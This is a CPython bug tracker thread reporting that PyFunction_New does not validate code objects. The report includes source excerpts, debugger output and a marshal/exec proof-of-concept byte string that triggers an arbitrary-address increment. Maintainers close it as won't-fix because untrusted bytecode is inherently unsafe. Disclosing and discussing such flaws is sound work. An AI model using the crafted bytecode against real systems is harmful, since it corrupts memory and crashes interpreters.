Issue 29825: PyFunction_New() not validate code object (original) (raw)
Created on 2017-03-16 08:47 by LCatro, last changed 2022-04-11 14:58 by admin. This issue is now closed.
Messages (4)
Author: (LCatro)
Date: 2017-03-16 08:47
PyFunction_New() not validate code object ,so we can make a string object to fake code object
This is Python ByteCode :
LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41' MAKE_FUNCTION 0
in source code ,we can see that string object trace to variant v
TARGET(MAKE_FUNCTION) { v = POP(); /* code object */ <= now it is a string object x = PyFunction_New(v, f->f_globals); <= using in there
and than ,we making a string object will taking into PyFunction_New()
PyFunction_New(PyObject *code, PyObject *globals) { PyFunctionObject *op = PyObject_GC_New(PyFunctionObject, &PyFunction_Type); static PyObject *name = 0; if (op != NULL) { <= there just check new alloc object point but not checking the argument code's python type (actually it is TYPE_CODE) .. PyObject *doc; PyObject *consts; PyObject *module; op->func_weakreflist = NULL; Py_INCREF(code); op->func_code = code; Py_INCREF(globals); op->func_globals = globals; op->func_name = ((PyCodeObject *)code)->co_name; Py_INCREF(op->func_name); <= it will make an arbitrary address inc by one ..
Opcode MAKE_CLOSURE similar too ..
TARGET(MAKE_CLOSURE) { v = POP(); /* code object */ x = PyFunction_New(v, f->f_globals);
poc and crash detail in update file
Author: Jelle Zijlstra (JelleZijlstra) *
Date: 2017-03-17 07:00
I don't think this is a bug; it is known and expected that you can do all kinds of bad things by writing bytecode manually. (You can already make Python write to random memory by giving it LOAD_FAST or STORE_FAST opcodes with incorrect offsets.)
This doesn't seem to be clearly documented though; the documentation just says that bytecode can change between releases.
Author: (LCatro)
Date: 2017-03-17 08:56
actually ,LOAD_CONST is taking an correct offset .I make a Python opcode compiler ,LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41' will conver to LOAD_CONST 1 .look back the poc ,it mean :
LOAD_CONST 1 => Load a string object from co->consts to python stack MAKE_FUNCTION 0 => first ,python core will pop a object from python stack ,and than using this object to create a function
so set a breakpoint at TARGET(MAKE_FUNCTION)
v = POP(); /* code object */ <= now it is a string object
x = PyFunction_New(v, f->f_globals);
PyFunction_New(PyObject *code, PyObject *globals) <= now argument code is a string object not code object
op->func_name = ((PyCodeObject *)code)->co_name; <= look there
Py_INCREF(op->func_name)
conver to assembly :
1e07e24e 8b4834 mov ecx,dword ptr [eax+34h] ... 1e07e254 ff01 inc dword ptr [ecx]
it mean ,if control data struct's offset 0x34 and it will conduct an arbitrarily address to inc
Python string object's struct like this : |Python_Type|String_Length|String_Data|
breakpoint at 0x1e07e24e ,look eax ..
0:000> dd eax 0204d2e0 00000003 1e1d81f8 00000024 c7554b90 0204d2f0 00000001 43434343 43434343 43434343 0204d300 43434343 43434343 43434343 43434343 0204d310 43434343 41414141 68746100 00275f5f 0204d320 0204e408 0204d3e0 fffffffd ffffffff 0204d330 00000001 1e1dbb00 01fda968 01fe28a0 0204d340 0204b590 00000000 1e1d9824 01fb1760 0204d350 00000000 00000000 01feb2c0 01ff9930
so [eax+34h] point to 0x41414141 ,inc dword ptr [ecx] => inc dword ptr [0x41414141]
i trigger this need compiler opcode to .pyc ,actually we can still trigger in .py ,this is poc :
import marshal
code=b'\x63\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x73\x0A\x00\x00\x00\x64\x01\x00\x84\x00\x00\x64\x00\x00\x53\x28\x02\x00\x00\x00\x4E\x73\x24\x00\x00\x00\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x41\x41\x41\x41\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x74\x00\x00\x00\x00\x73\x08\x00\x00\x00\x3C\x6D\x6F\x64\x75\x6C\x65\x3E\x01\x00\x00\x00\x74\x02\x00\x00\x00\x00\x01'
poc=marshal.loads(code)
exec(poc)
Author: Serhiy Storchaka (serhiy.storchaka) *
Date: 2017-03-17 09:16
This is a deliberate decision. In general, it is very difficult to verify the bytecode for correctness (whatever correctness criterion has been chosen). Any check takes time and this will slow down the execution in the normal case. This is not considered security issue since passing untrusted bytecode is not safe in any case.
History
Date
User
Action
Args
2022-04-11 14:58:44
admin
set
github: 74011
2017-03-17 09:16:32
serhiy.storchaka
set
status: open -> closed
nosy: + serhiy.storchaka
messages: +
resolution: wont fix
stage: resolved
2017-03-17 08:56:17
LCatro
set
messages: +
2017-03-17 07:00:29
JelleZijlstra
set
nosy: + JelleZijlstra
messages: +
2017-03-16 08:47:57
LCatro
create